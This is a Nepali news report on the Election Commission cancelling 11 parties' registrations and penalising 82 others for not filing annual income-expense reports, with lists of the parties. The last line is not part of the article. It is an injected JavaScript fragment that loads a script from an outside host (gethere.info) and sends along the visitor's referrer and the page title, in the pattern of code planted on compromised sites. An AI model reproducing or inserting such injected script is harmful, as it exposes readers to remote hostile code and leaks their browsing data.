काठमाडौं, असोज ७–निर्वाचन आयोगले समयमा आय–व्ययको वार्षिक प्रतिवेदन नबुझाउने ११ दलको दर्ता खारेज गरेको छ । यस्तै ८२ दललाई कारबाही  छ । %e0%a4%aa%e0%a5%8d%e0%a4%b0%e0%a5%87%e0%a4%b8-%e0%a4%b5%e0%a4%bf%e0%a4%9c%e0%a5%8d%e0%a4%9e%e0%a4%aa%e0%a5%8d%e0%a4%a4%e0%a4%bf-%e0%a5%a7
निर्वाचन आयोगले एक विज्ञप्ती जारी गर्दै भनेको छ–प्रचलित कानूनी व्यवस्थाको बेवास्ता गरी आय–व्यय विवरणको वार्षिक प्रतिवेदन नबुझाउने, मिति २०७३।३।२१ को गोरखापत्र दैनिकमा सूचना प्रकाशन भए पश्चात आयोगले तोकेको भनाई पेश गर्ने अवधिमा चित्त बुझ्दो भनाई पेश नगर्ने तथा सो अवधिमा समेत आय–व्ययको विवरणको वार्षिक प्रतिवेदन तथा भनाई पेश नगर्ने देहायका राजनीतिक दलहरूलाई राजनीतिक दल सम्बन्धी ऐन, २०५८ को दफा १६ बमोजिम रू. १००।– जरीवाना गर्ने र आगामी दिनहरूमा प्रचलित कानूनको म्यादभित्र निर्धारित ढाँचामा दलको आय–व्ययको विवरणको वार्षिक प्रतिवेदन पेश गर्न सचेत गराउने ।
आयोगले दिएको निर्देशनको वोवास्ता गर्दै आयव्ययको विवरण नबुझाएकाले दर्ता दर्ता खारेज र सचेत गराउनेसम्मको निर्णय गरिएको बताइएको छ ।
कारबाहीमा परेका  दलहरुः

राष्ट्रिय नागरिक पार्टी
जनतान्त्रिक तराई मधेश मुक्ती टाइगर्स
राष्ट्रवादी जनता पार्टी
चुरेभावर राष्ट्रिय पार्टी
नेपाल सद्भावना पार्टी (गजेन्द्रवादी)
राष्ट्रिय विकास पार्टी
मधेशी जनअधिकार फोरम मधेश

नेपाल युवा किसान पार्टी
युवा शक्ति नेपाल पार्टी
राष्ट्रिय थारू समाज एकता पार्टी
राष्ट्रिय स्वाभिमान पार्टी नेपाल
नेपाल कम्युनिष्ट पार्टी
नेपाल न्यायिक दल
लिम्बुवान मुक्ति मोर्चा
पिछडावर्ग निषाद दलित जनजाति पार्टी
नेपाल जनसमावेशी एकता पार्टी
विश्व सत्यवादी पार्टी
गरिब जनताको क्रान्ति पार्टी
लिम्बुवान मुक्ति मोर्चा नेपाल
राष्ट्रिय मधेश एकता पार्टी, नेपाल
नेपाल राष्ट्रिय यातायात विकास दल
राष्ट्रिय जन विकास पार्टी
संयुक्त जनमोर्चा
नेपाल जनहित पार्टी
संघीय लिम्बुवान राज्य परिषद
नेपाल राष्ट्र सेवा दल
सहकारी पार्टी नेपाल
श्रमिक जनता पार्टी–नेपाल
नेपाल मधेशी जनता दल
(समाजवादी)
राष्ट्रिय पुनर्जागरण पार्टी
लोक दल
नेपाल लेबर पार्टी
नयाँ नेपाल राष्ट्रिय पार्टी
नेपाल कम्युनिष्ट पार्टी (मालेमा) साम्यवादी
राष्ट्रिय लोकतान्त्रिक युवा पार्टी
जनता दल लोकतान्त्रिक पार्टी
नेपाल श्रमजिवी दल
नेपाल सद्भावना पार्टी (युनाइटेड)
लोक कल्याणकारी जनता पार्टी, नेपाल
नेपाल सुकुम्बासी पार्टी (लोकतान्त्रिक)
तराई–मधेश लोकतान्त्रिक पार्टी
नेपाल लोकतान्त्रिक समाजवादी दल
बहुजन शक्ति पार्टी
मधेशी जनअधिकार फोरम
(गणतान्त्रिक)
जन प्रजातान्त्रिक पार्टी
नेपाल राष्ट्रिय विकास पार्टी
अखण्ड नेपाल पार्टी
मधेश तराई फोरम
नेपाल गौरवशाली पार्टी
थरूहट तराई पार्टी नेपाल
लोकतान्त्रिक जनता पार्टी नेपाल
राष्ट्रिय जनता दल नेपाल
गरीब एकता समाज पार्टी, नेपाल
मातृभूमि नेपाल पार्टी
नेपाल गणतान्त्रिक एकता पार्टी
नेपाल जनता पार्टी
संयुक्त राष्ट्रिय जनपरिषद्, नेपाल

लिग नेपाल शान्ति एकता पार्टी
तराई पहाड हिमाल समाज पार्टी
शिवसेना नेपाल
राष्ट्रिय एकता मञ्च
लोकतान्त्रिक पार्टी–नेपाल
नयाँ संघीयता जनधारणा पार्टी
नेपाल समता पार्टी
नेपाल राष्ट्रवादी पार्टी
युवा नेपाल पार्टी
नेपाल दलित पार्टी
युनाइटेड नेपाल रिपब्लिकन पिपल्स पार्टी
नेपाल गणतान्त्रिक जनता पार्टी
नेपाली ग्रिन्स पार्टी
संघीय लोकतान्त्रिक राष्ट्रिय मञ्च
नेपाल समाजवादी कांग्रेस
नेपाल लोकतान्त्रिक जनता कांग्रेस
नेपाल जन एकता पार्टी
नेपाल रिपब्लिक पार्टी
राष्ट्रिय लोकतान्त्रिक गान्धीवादी पार्टी
डेमोक्रेटिक नेपाल रिपब्लिकन पार्टी
राष्ट्रिय एकता पार्टी प्रजातन्त्रवादी
समाजवादी जनएकता पार्टी नेपाल
बहुजातीय समावेशी पार्टी
नेपाल लोकतान्त्रिक नागरिक पार्टी
राष्ट्रिय शिव सेना पार्टी

खारेजीमा परेका दलहरु

नव नेपाल निर्माण पार्टी
जनयुनिटी को–अपरेटिभ पार्टी नेपाल
तराई मधेश पहाड हिमाल एकता पार्टी
हरियाली नेपाल पार्टी
ॐ सेना नेपाल
नव जनवादी मोर्चा
नेपाल कम्युनिष्ट पार्टी (संयुक्त माक्र्सवादी)
नेपाल प्रजातान्त्रिक युवा पार्टी
नेपाल जनसंघ पार्टी
नेपाल दलित श्रमिक मोर्चा
नेपाल कम्युनिष्ट पार्टी (एकीकृत)

खारेजीमा परेका दलहरुको नाम, निर्वाचन चिन्ह र झण्डा दलको दर्ता खारेज गर्ने निर्णय भएको मितिले एक वर्षसम्म अन्य कुनै राजनीतिक दलले प्रयोग गर्न नपाउने गरी फ्रिजमा राख्ने र उक्त विषयमा सर्वसाधारणको जानकारीको लागि नेपाल राजपत्रमा सूचना प्रकाशनको कारवाही गर्ने आयोगको निर्णयमा उल्लेख छ ।

यस्तै सचेतमा परेका दलहरुले भने ३५ दिनभित्र पूर्ण आयव्ययको विवरण पेश गर्नुपर्ने आयोगका प्रवक्ता उसहसचिव सूर्यप्रसाद शर्माले जानकारी दिए ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;